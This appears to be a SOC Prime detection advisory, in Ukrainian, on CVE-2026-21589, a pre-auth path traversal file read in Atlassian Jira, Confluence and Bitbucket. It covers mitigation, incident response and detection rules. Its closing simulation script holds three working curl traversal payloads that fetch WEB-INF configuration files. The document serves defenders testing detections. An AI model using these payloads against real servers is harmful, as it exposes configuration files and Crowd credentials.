SOC Prime Bias: Critical

08 Oct 2026 06:26 UTC

CVE-2026-21589: Уразливість читання файлів Atlassian Jira та Confluence без аутентифікації

Author Photo
SOC Prime Team linkedin icon Стежити
CVE-2026-21589: Уразливість читання файлів Atlassian Jira та Confluence без аутентифікації
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Критична вразливість довільного читання файлів до аутентифікації, CVE-2026-21589, впливає на декілька продуктів Atlassian, включаючи Jira, Confluence та Bitbucket. Зловмисники можуть скористатися вразливістю міжкаталожного обходу шляхів, яка включає :: розділювач, щоб отримати доступ до конфіденційних файлів у кореневій веб-директорії застосунку. Успішна експлуатація може розкрити облікові дані Atlassian Crowd у відкритому тексті, що потенційно дозволяє адміністративний компроміс системи управління ідентичністю.

Розслідування

Дослідники проаналізували вразливість у atlassian-plugins-webresource JAR, порівнюючи уражені та виправлені випуски. Вони з’ясували, що певна функція перетворює подвійні двокрапки у косі риски, роблячи можливим міжкаталожний обхід шляхів. Цілеспрямуючи вибрані ресурси з плагінами з кінцевими рисками, дослідники змогли вилучити конфіденційні файли, такі як WEB-INF/web.xml and crowd.properties.

Пом’якшення

Atlassian опублікувала рекомендації з безпеки та виправлені випуски для всіх уражених продуктів. Організації повинні оновити версії до рекомендованих виправлень, як-от Bitbucket 10.5.1, Confluence 10.2.19 та Jira 11.3.12. Впровадження правил WAF, здатних виявляти шаблони міжкаталожного обходу шляхів із використанням подвійних двокрапок, закодованих символів та підозрілих запитів ресурсів, може забезпечити додатковий захист.

Реакція

Якщо підозрілі спроби міжкаталожного обходу шляхів із використанням :: виявлені в URL-адресах, інцидентна група повинна негайно ідентифікувати та ізолювати цільовий екземпляр Atlassian. Перевірте Atlassian Crowd на несанкціоноване створення облікових записів, підвищення привілеїв або іншу аномальну активність. Перегляньте запити, націлені на WEB-INF ресурси та змініть будь-які облікові дані, які можуть бути розкриті через конфігураційні файли, такі як crowd.properties.

Потік атак

Ми все ще оновлюємо цю частину.

Виявлення

Можливе додавання користувача Jira до адміністраторів (через вебсервер)

Команда SOC Prime
07 жовтня 2026

Можливе створення користувача Jira (через вебсервер)

Команда SOC Prime
07 жовтня 2026

Можлива спроба експлуатації CVE-2026-21589 (Atlassian Jira, Confluence, BitBucket до аутентифікації довільне читання файлів) (через вебсервер)

Команда SOC Prime
07 жовтня 2026

Довільне читання файлів продуктів Atlassian через міжкаталожний обхід шляхів [Вебсервер]

Правила SOC Prime AI
07 жовтня 2026

Виконання симуляції

  • Опис атаки та команди: Зловмисник проводить розвідку підозрюваного екземпляра Atlassian. Вони використовують відомий шаблон експлойта для CVE-2026-21589, який використовує специфічну техніку обходу із використанням подвійних двокрапок (::) для навігації по файловій системі через вебінтерфейс. Мета полягає у вивантаженні web.xml для відображення внутрішньої структури застосунку та потенційного збору облікових даних для подальшого руху вбік.

  • Регресійний тестовий скрипт:

    #!/bin/bash
    # Скрипт для симуляції для активації правила виявлення шляхів Atlassian
    
    TARGET_URL="http://localhost"
    
    echo "[+] Початок симуляції: міжкаталожний обхід шляхів Atlassian"
    
    echo "[*] Спроба Навантаження 1: міжкаталожний обхід Jira web.xml..."
    curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] Спроба Навантаження 2: міжкаталожний обхід Confluence web.xml..."
    curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] Спроба Навантаження 3: міжкаталожний обхід Bitbucket urlrewrite.xml..."
    curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml"
    
    echo "[+] Симуляцію завершено. Перевірте SIEM для отримання попереджень."
  • Команди очищення:

    # Жодних постійних змін у системі не зроблено; очищення не потрібно.
    echo "[+] Очищення не потрібно. Симуляція була недеструктивною."